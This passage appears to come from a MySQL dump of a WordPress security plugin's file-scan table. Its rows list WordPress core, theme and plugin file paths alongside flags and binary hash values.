��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/psalm-above-3.xml',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|<Qq��)@�M��J��','/�jo�z�y����@��z%9�&F%��[','',0,'?'),('�c�̎��$\n\'@�\r��','wp-admin/setup-config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�~yEfF��d�x��','O�tJʰ�Z伡��V�S<ͤw�z1W�~>��0)','',0,'?'),('�m֙7�,�}��ov','wp-includes/css/dist/block-library/theme-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Ԝ����p1l�','\ns�:���$�}K���%\rr�hM��Ap\r��','',0,'?'),('��ި5QvLW�cw�Щ','wp-content/themes/singularity/inc/customizer-library/js/customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�#TI�:0�\rш���','c�2���0ꡳ)����w<C8f��Q�;�sм','',0,'?'),('���7ԼwU1h�ѽg|�','wp-content/themes/catch-flames/inc/panel/customizer/customizer-sanitize-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u��s�yΐ��ſ�','Trr�I�B�tk��b���06d3�ʹ��ƀ','',0,'?'),('���V��t�S�-��','wp-content/plugins/wordfence/views/scanner/issue-file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Z>?�iY+Q�K�C��','r������쐋����&5�Q8�C\"���K�','',0,'?'),('���H\03�ۡ�E�p�$$','wp-content/themes/twentytwenty/template-parts/navigation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��,�)�\Z~w�������','�%���K.�P��V�vZ�ښ�[\0�ȗfE��6','',0,'?'),('��lvth\"�{�Խ�DK�','wp-content/themes/enigma/css/font-awesome-4.7.0/scss/_core.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ϝ��[w�hPw�','�ƚ����8~����W*T������D�>u�','',0,'?'),('���J1��M�F��<�','wp-admin/js/tags-box.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	P�f�R2���.��z','��/��\n���0ۥK���.�Į�\r&$B�\Z}','',0,'?'),('�����Ƅ���NB׭','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-pedantic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@8���s��A��','b�#�x��h�F4�_ �De���qeD��','',0,'?'),('��0[�;�h���P�X','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/isotope.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"YB�i:�t]I\ro�','[^|��Z5�\n#Y���;��M�y]h�m','',0,'?'),('��5D�Xd��w����','wp-content/themes/chronus/template-parts/featured/featured-large-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��JU7D\\rbv-(�','�Pݹ�@�_~Y}a�;,@k���0F��AU^�','',0,'?'),('���1K�]i)���G�','wp-content/themes/brickyard/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_\\T�^�L���=/+6','��k�})\n��\"s��|��������nRQ�','',0,'?'),('�Ш���X7� �Ƞ�6','wp-content/themes/catch-responsive/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�\'�����a��a�\0','�}Q�9r�#RMo��3̠���� �K\0-�`h','',0,'?'),('���?ڟ�E���$PF','wp-includes/pomo/translations.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C���*\Z�\'��',')��P��Š�ObxZ-dtWN��ǧ�~x�^Y��','',0,'?'),('��\\���5��� �\0p','wp-content/themes/event/page-templates/gallery-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aȭ�\0�\nBaا_{4�','k�0�\"��s:�Ф��u9�V����Rݞ%��','',0,'?'),('�ߐ�|79���zc��','wp-content/themes/catch-flames/content-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','95!��W�Wܯ�','4n*&ͩ��}��z\n��S�ꇘ���J���','',0,'?'),('��ҧ{����W����_','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/controls/preset.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o����.�t����j','�����C��X���c���L����h�T4jj','',0,'?'),('���6��b�g�>_�','wp-includes/images/wlw/wp-watermark.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��uMmܭD|�w���D','�S��nR�\'��X�^���kh����ɑ�i�7�','',0,'?'),('����		PuF�h�o�','wp-content/themes/metro-magazine/images/btn-next-month.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M���K�v��-�40','8������ߛKE���r>����&��\"�l','',0,'?'),('�h�x�*(�&���kO�','wp-content/plugins/wordfence/views/blocking/country-block-map.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u��yGF�,{��X�z','%Ԝ5��;�����x��^)���G(��o','',0,'?'),('�����\'K�z�f��','wp-includes/customize/class-wp-customize-header-image-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�$+��q?��U��','�9@mr�ܵ��\"+B���V�K.�uB\"�����','',0,'?'),('�.��x;�i�N�vN','wp-content/themes/wp-simple/inc/kirki/kirki/assets/images/1c.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ʦ�e3�U�k�$','�ː)��͑`�Pb��L����E��C���','',0,'?'),('��5#�\"8�%`}','wp-content/wflogs/template.php',0,'lC�db��.�˴�v','lC�db��.�˴�v','Z][W��P�}�,������7*�q��\n��Ƒ��','',0,'?'),('�\r�f����h�8�!','wp-includes/Requests/Exception/HTTP/500.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����km�\n	H�M��','FO���V3\"���������!k�P�','',0,'?'),('���v9�b�$�L','wp-includes/random_compat/error_polyfill.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X:,��t]7�=��Q��E','��,��t�\0_g�X%4.�tP�]�>�JT4','',0,'?'),('�!Y;��I-���u','wp-content/themes/twentynineteen/classes/class-twentynineteen-walker-comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�rV��S�|�k���',' ��^��67�+�k�`�ۍ���]B���G��p','',0,'?'),('�#�?���Gc	¯l1e','wp-includes/class-wp-theme.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ɱ��h�k2\\���','��8B�^���K��ڝo�d#T��s\0����C','',0,'?'),('�+Z�黶:�qO9]�W','wp-content/themes/weblog/acmethemes/customizer/header-options/menu-option.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����V�)�\rE@�','Bv?	�O/&0���b$�U��r����%�4\"','',0,'?'),('�/�m|�����\"F+5�','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/mode/smarty/smarty.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��λ,�X W�:>',')L_�HIГJ��z8�r�5�r1�����V,�:','',0,'?'),('�1F��.c�7���gnN','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/fold/markdown-fold.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x;V� \0E�)`� ','�0���+�5߯��2{�\Z�(�\r *�g��','',0,'?'),('�3���I��dpp�<��','wp-content/themes/advance/inc/kirki/assets/scss/controls/typography.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T�Gz��Fi�6��c','.��zF2�V�^W�,#g�!t���t���g8�','',0,'?'),('�H�����Pw��%8��','wp-includes/images/smilies/icon_sad.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ix�o��TMz��D-','�b5�yh�9���}���o��W�I��n�n�','',0,'?'),('�H���W��J�%ג9�','wp-content/themes/graphene/images/list-style-image.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�[�Dz�f[������','��jz�3e�d�J:ie�f��n*�x|l5�<^�','',0,'?'),('�K�{�*�)�����','wp-content/plugins/all-in-one-wp-security-and-firewall/js/wp-security-admin-script.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j�@�c��<�W8DM','��wL�\rd�Ê��3��<\'\n�:&̉��$޲3$O','',0,'?'),('�Q49��Lz�J�','wp-content/plugins/wordfence/lib/wfUtils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','()p��|˜���s���T','���R��j�-y}��EHh\r�F�D�����BA�','',0,'?'),('�V��{v#���V�mE','wp-content/themes/advance/inc/kirki/assets/js/controls/checkbox.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ă���O*��B�&X�T','_��\'`���tQ?_��`N�\0C���p�X��','',0,'?'),('�XX*��!2�~�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�eb:lx-�<��s99`','�,��{ m��Z��BV�TL�;*���<','',0,'?'),('�ZJ�V!���ّ��','wp-content/themes/Endolf/inc/breadcrumbs.php',0,'\'W�w�S��䇺���j�','\'W�w�S��䇺���j�','nB�X-TZq�˝����J-J��]�#��4A�<q','',0,'?'),('�[�n�G{�\'��q:�','wp-includes/ms-deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������K��Mý','��{�\"�z�GW1ɓDĝ��U�͏�[���','',0,'?'),('�\\�h� R�X�<�C�','wp-content/plugins/wordfence/lib/wfMD5BloomFilter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���߅�w@L��O�R','��EF�j���r�č;s��΀.f:��Ϥ�F','',0,'?'),('�_�f	.���-(��','wp-content/themes/catch-responsive/js/source/jquery.cycle/jquery.cycle2.shuffle.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ΊK�%\Zl�Uc��Z','5��C����o����S���X���d���X','',0,'?'),('�k�2�ǃ~yy���UW�','wp-content/themes/quicksand/js/flexslider/jquery.flexslider-min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q:]U�f�}il�\'$','���6�I�|�i��*����\Z|�+�x�','',0,'?'),('�|W��<�|ƀJ��','wp-content/plugins/wp-cerber/assets/flags/cw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('�����;A�r�W�-','wp-content/themes/brickyard/images/searchform-send.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<>�#s�yL0��','��i۴���˗�~���6ߞ�&_�S��`�','',0,'?'),('��J�ח�_yzx�6O','wp-admin/network/privacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0��>�H\r��5:�6�','*]X8���%�KқR	���Q�f�;\ne�\r�6\\','',0,'?'),('��nrSF��.�7A*O','wp-content/themes/graphene/changelog.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t��3}�MB��%�u(','J�E�uT\nN���a�jQHE/�����Z!�O','',0,'?'),('���Ȁ�~_q�I��S�','wp-admin/js/password-strength-meter.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Z��3�r�;]�<|�','����1��y吥!�}}�3ɻ}}�te\nt�','',0,'?'),('���\\�D �>�F,���','wp-admin/menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�����\r�]@��','�M�!҃�hMg?LO�\0ş�@���M�\"M�.','',0,'?'),('���e\"��w��&W���','wp-content/themes/chronus/assets/js/navigation.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}K�@����pV;��','Qt�X�C	O��) _?9q�;ī�;��\0�qm','',0,'?'),('��>>D�ς���wOwi','wp-content/themes/Endolf/homepage.php',0,'u6LIqk �&K�\rܐb','u6LIqk �&K�\rܐb','1�w�F�j�J��+���G�}���/�f�f|�','',0,'?'),('��	�\")�\"��0I�o��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z��q\Zs��q776�','C�D�a�$�=�f[Q�4�JW�7l)�.�=%��','',0,'?'),('�������&Ż�(','wp-admin/js/widgets/custom-html-widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#��˧0�o�r�j�{�','<������\"W63�`�/p�0h���LH�MG1','',0,'?'),('����\r�t�J��f)','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/coffeescript/coffeescript.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ި{�Lf���v�G�','OVt J(ׁ�s�;�K�{�㺋s�ɡ,e#_}� ','',0,'?'),('��K����P���','wp-content/themes/wp-simple/inc/kirki/kirki/includes/output/field/class-kirki-output-field-multicolor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',q=��`�qG��Ig',' ��TW��&D2eeJ!����bq�\"�w�*�ߔ>�','',0,'?'),('��Uu��d���{�X','wp-content/themes/authorize/assets/stylesheets/font-awesome/scss/_animated.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�O5�{��XPuq_A��','�����@�YV�\r�6��&O4A��Z<x��u','',0,'?'),('��~+�q�X��\"`','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�oaQ���|g�4&��','�c�U�X����+�]Wvd�=�,����Z0)\\�','',0,'?'),('��d�^�<����8','wp-content/themes/saybusiness/js/lightbox.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z����4R�T�[�>�','\'����_[�����!O���2ؾ����U�`','',0,'?'),('���&�O���%�Z��','wp-content/themes/wp-simple/inc/kirki/includes/class-kirki-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I�z��v5Pp�\'��v�','�a[a4����\r�8p�Cy\Z8�{�JΫX����','',0,'?'),('�=�K�K8�ak��E','wp-content/themes/enigma/images/s1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����\0�h�]]�','_�b�������Hƴ� �N���L[�򼧎)0h','',0,'?'),('�A\r����D7�','wp-content/themes/wp-simple/inc/kirki/assets/js/controls/select.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��<�-k���F�ѝ�','˄ ��,���A�Ć\0?�l�س��&�C4�','',0,'?'),('�Tm5�Pf8d��^N','wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-upload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��>=���\Z1����','�u3{#\'r=MY,��k��ڎ\0��R�tY��','',0,'?'),('�T�r6�0d#�B�C','wp-content/themes/skt-pathway/css/mobile.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���O��p�I@��q','�j�&mE���d�tZO[��=�Bh8��FS��|','',0,'?'),('��}Hy�M��1�ě8','wp-admin/images/about-badge.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�nڢ�U�����M�','��@^��Iͮ�s������L�:}|9�ƶ�KXk','',0,'?'),('���\Zߍ�7�����W','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/dracula.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F���b�3H|�����U','��Ŏ��zI��8����Q,���=�4�?!','',0,'?'),('��9�!H4�褢*��;','wp-content/themes/enigma/css/font-awesome-4.7.0/less/core.less',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N�J�77phu��Ƿ�',',��w���!s��0�Hr{�DߎQ���1F)�','',0,'?'),('��=CѠ��*TX�4','wp-admin/css/colors/_variables.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ր�]P�̍f��Vk�k�','�3}�c9j�my�����@s��p�VR�9Z','',0,'?'),('�����x4��B\'����','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/sql/sql.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&ҁ|���z|$�n��','\ZfE��-����\0�K���>�� ��2�Ǔ��S�','',0,'?'),('���\'}�,r���h','wp-content/themes/the-best/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:t���ab0x��!z�','X;�1Mr�G{���\\y��%1�`��ak��[��','',0,'?'),('��ڷt�g�Z�gE�','wp-includes/class-wp-http-response.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��4��y�K���ߕ','�Ι	��[�{\0If�\0�t��v\n9d����x��','',0,'?'),('���)�j��E�v�X','wp-content/themes/Endolf/header.php',0,'�7�A(�rN�2�T�a','�7�A(�rN�2�T�a','rU� �;�z� Ȼ�x$\n|��zF.��k��}M�','',0,'?'),('�� ��It13&','wp-admin/js/nav-menu.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F0�ݶN��j�!�','����mn��hAɉg8��gj���m[)�B��','',0,'?'),('���Y.{\';mɯ,9��','wp-content/themes/enigma/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���q�\r��N���^>�','�tVAj�b��o�*�P\0r�g}�0���i3','',0,'?'),('����1o[���4R','wp-content/themes/wp-simple/parts/frontpage-news.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^�}	��9�J��\'s','�����Ni��6n&����I�����I�','',0,'?'),('���n�\Z�\r�N�&95�','wp-content/themes/brickyard/docs/assets/blueprint-css/plugins/buttons/icons/cross.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','BI&��CV�4�N��','�ti�/V!l���^)2ež	�U�U�A\0rH+','',0,'?'),('�φ�[�y`�zb���','wp-content/themes/graduate/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���b��}t<�u\0>�i','��&�\"�\'�ς�\"�r�A����^�3;]�','',0,'?'),('�_�nv�OfS���S!','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-select2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[�>i�1L1��q�E4*','u\0yUM���ɪ���vU�Y`�I�A5xa�vN@','',0,'?'),('���G�l���ݠ_�','wp-includes/js/dist/date.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W!j`(�YՌ�f�','��2�&�;��F�7�A\nOM�X�����','',0,'?'),('�J-狁��\\\"�ץ&�','wp-includes/sodium_compat/src/Core/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��w.�n��7��I���','����W��.�3$��^�O�:7za��0A�','',0,'?'),('����*x@A	C�RuR�','wp-content/themes/university-hub/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#���l��eeun��e','��)b���B��ʝ���� ���\'�a�|����j9�','',0,'?'),('�\"$��B3��\rS��S�','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/bin/release',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��	\rY_-J�3�q�','k�%�Ҁ�w_3�P�S�٩��5�ڂ\r�G�۞','',0,'?'),('�;?2��S��\0��p','wp-admin/customize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w ���y����C>�','��vV��� v�b��\Z�[Zu�G� GnA�\"�H77','',0,'?'),('�VV��-13)�\nq�\0','wp-content/themes/newsmag/inc/customizer/settings/general/sections.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|;�qӲtP_�h�K','0�(�/J�?Tluø��t�{�������Y','',0,'?'),('�W�-�ى��|�Ǘ��','wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-stop-users-enumeration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/��b�)EoB�$�w�M','�x�c�$I-=�VMjSd�b�6A;{��','',0,'?'),('�X��@��%�1C��i','wp-content/plugins/wordfence/images/lightbox-controls.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m]�a���\\$��','Ǘ�h?���S���)�:���i@h.��X�g��','',0,'?'),('�[�?��n2��\"d�d','wp-content/plugins/wp-cerber/assets/bn4ra.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8��L���uLT�','�TZ�G���~S-�{&M:�\r��/7O���T�','',0,'?'),('�]�.�1\rPXL�','wp-admin/includes/update.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^	�4j��/�?\\��','�V��a�U�ˁ�F�V���ߴYn$\ZӸ#�\'R�K�','',0,'?'),('�bo�W,e`�mъ�','wp-content/themes/wp-simple/inc/kirki/assets/js/reset.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v]���Q]\r� �g��','v��aAkP��TrBC^z��(piB�i��k:�','',0,'?'),('�f(�9��6��yaN|2','wp-content/plugins/wordfence/waf/pomo/translations.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z^:@��JKL����S','�\rH����n`�>�--\\Tr���7,��','',0,'?'),('�l_S�	9�����[','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-utility.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A��4��)�R�>��i','�4xZP���]�QT[6�Z;����n���P�','',0,'?'),('�n�Fܺ�}3����','wp-content/themes/simpleshift/inc/kirki/includes/controls/class-kirki-controls-dimension-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Yb~p��˺�>��닄','����Kb�i�f+,j��BwkY���5Ɔ���','',0,'?'),('�p>\rO�\Z�&�)i����','wp-content/themes/edge/js/source/html5.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S}�n�\"�[�B(	��','�d�!\Z�y�/R�Z}=nF��/ZI�A��','',0,'?'),('�rY��\0�S���(z|�','wp-content/plugins/wordfence/modules/login-security/classes/model/notice.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-Gb�yf��|��S���','�o��G5}[�`�n��x���ܡ^�@B#���lb','',0,'?'),('�s8��\'��ɀ�\Z%Cx','wp-includes/blocks/archives/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�P*�5�\\�d\"Sn�','�/qkU����5i�#��-�̄aye�d̹�B:','',0,'?'),('�u$�{���ܨ��v�','wp-includes/blocks/latest-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��j��c\r9+@/K<�2','=�\n+rS�D;��|�Y}�VĒP[�o =]LJ','',0,'?'),('�z�o���R�T','wp-content/themes/exoplanet/images/left-sidebar.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���&���	5\Z�?��:�','6�#�B�f�,��Z�#_�K�h����@����7','',0,'?'),('�~K�Ɂ�wwf�C�','wp-admin/js/widgets/media-gallery-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�c/����I���<�','�y�\\�R�T�ܠ�U�tmY�(��㻱̿','',0,'?'),('�?���LTD�ջP6E','wp-content/themes/singularity/screenshot.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����{�y��=C','@���Y���w�����锨�p�YRS�R){\":H','',0,'?'),('��}z��#����\Z','wp-includes/Requests/IRI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','52]��{�}��	`X','�I?~�4���]4�����K��F��\"v�I(','',0,'?'),('���ƌ\Z��,�H��','wp-content/themes/twentynineteen/postcss.config.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�xZ�SY�S�m\"	��a','�UYX�}�m�\",W�9:۸�.�෦Ho�\"�','',0,'?'),('��X׎m�1�x:İ^�','wp-content/themes/saybusiness/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���я/�<�&�_��3=','���}�K��z����)�P��B6et�','',0,'?'),('��K���K�1�l�!�D','wp-content/themes/twentytwenty/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Ƅ�&8����','̸����������\n�X���Gz�y�\\Kq�WQ','',0,'?'),('��\0ceU�`�{��g��','wp-content/plugins/wp-cerber/assets/flags/kr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�Uґ0Pl�{��ip','Zy���\Z�(�r��Q�N��ӌ���b�[P���','',0,'?'),('��\r���[��\0�EuJ','wp-includes/sitemaps/providers/class-wp-sitemaps-taxonomies.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V�̦���QK�#΀','�Q��]+N��[m^̋B���1��Ϗ��}�','',0,'?'),('��4�y�3%k� ����','wp-admin/js/widgets/media-image-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��;k�#?��cQ7��(e','�o��{�\rr�h5��F�w�w�	L�e�Fz�]�','',0,'?'),('��âą�k<��Й�','wp-content/themes/edge/css/editor-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O���4�(3\"�2��','�t�u&xI6�¦v��u,��2P�Ț)W','',0,'?'),('������|� ��','wp-includes/js/masonry.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';?�&��T�Je�xH','$��!�|=#f�c�jc���:��T�Q0b�,ʉ�','',0,'?'),('����!�c+�v�ȓ}','wp-content/themes/wp-simple/parts/loop.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Hs���v/��	��s��','��Z,��}o�Ϣ���v��f�>�6�%S�','',0,'?'),('��Θ��r(��Ł�� ','wp-admin/js/auth-app.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#���LP���S[��f�','F@H���8�݇��7an���#{�����j�','',0,'?'),('��nHHХR���?','wp-content/plugins/wp-cerber/assets/flags/gh.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,La^���#d�e\'','��^�sV��z�3���:4�i�[��K���','',0,'?'),('��.����BǪ	Y��','wp-content/themes/gambit/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\r�/�EWg>/�','	w�;���k�!�4�뾻:�{�` �]�t��j�j�','',0,'?'),('���v{C����ҧ��4I','wp-content/plugins/wordfence/lib/wfViewResult.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�����\"J�3Z��w','�m��e�=�H��oD���OT�\0�v���','',0,'?'),('��p�$^���d�Z','wp-admin/network/plugin-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%(F��v\0�~��F','ڙs-s���~�uYe������T��F�4�!� *','',0,'?'),('�ګ�c\r2�8.�\'�\"','wp-content/themes/twentytwentyone/assets/js/customize-preview.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?yO��+��D��','�\n=/��?I�l�b�i��8�A�HxV�5A?vi','',0,'?'),('��G��ۉ��\\}����','wp-content/plugins/wp-cerber/assets/flags/cc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� .-6�׈���C#�','&��i��y�_��_����vV>�~���d','',0,'?'),('�������en�j��','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/addon/runmode/runmode.node.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɯ�~=�*^Yj�:s','��{г%�����	�\Z�~c�$���Zi�','',0,'?'),('��[K���b���28�','wp-includes/pomo/po.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{K_��eG�@{	/','�G\n�{2����@k�ٗ��9Բ�1G9��P�','',0,'?'),('���	,�Y�;C�Qh)','wp-content/themes/catch-flames/js/jquery.cycle.source/jquery.cycle2.flip.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���s�Z�io�V*S�D','�\\_��66kQWI��`��	%�����Q���I��V','',0,'?'),('��\r�\Z�Q��)�z3p','wp-content/themes/newsmag/assets/sass/layout/_header.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���1^��PT9����8d','�ʄ��]\nj[;�^�K��i#�x���q^�t','',0,'?'),('�����2�x՘�>:=','wp-content/themes/wp-simple/parts/header-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c��k��ǯL`���<','�&@ҝ��9pu�wȯV�m�/��OT�&1Z','',0,'?'),('���X����J��p','wp-content/plugins/wordfence/lib/wfBrowscapCache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T����Q�x�j�','�����1Y����T��Ј�q�W6݋���h	','',0,'?'),('�6�UØ�c	o=��','wp-content/themes/hitmag/inc/customizer/assets/imgs/1cc.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|�$RUw��ťI','��w��o�WC��ON��.�fL��\Z%\Zh, 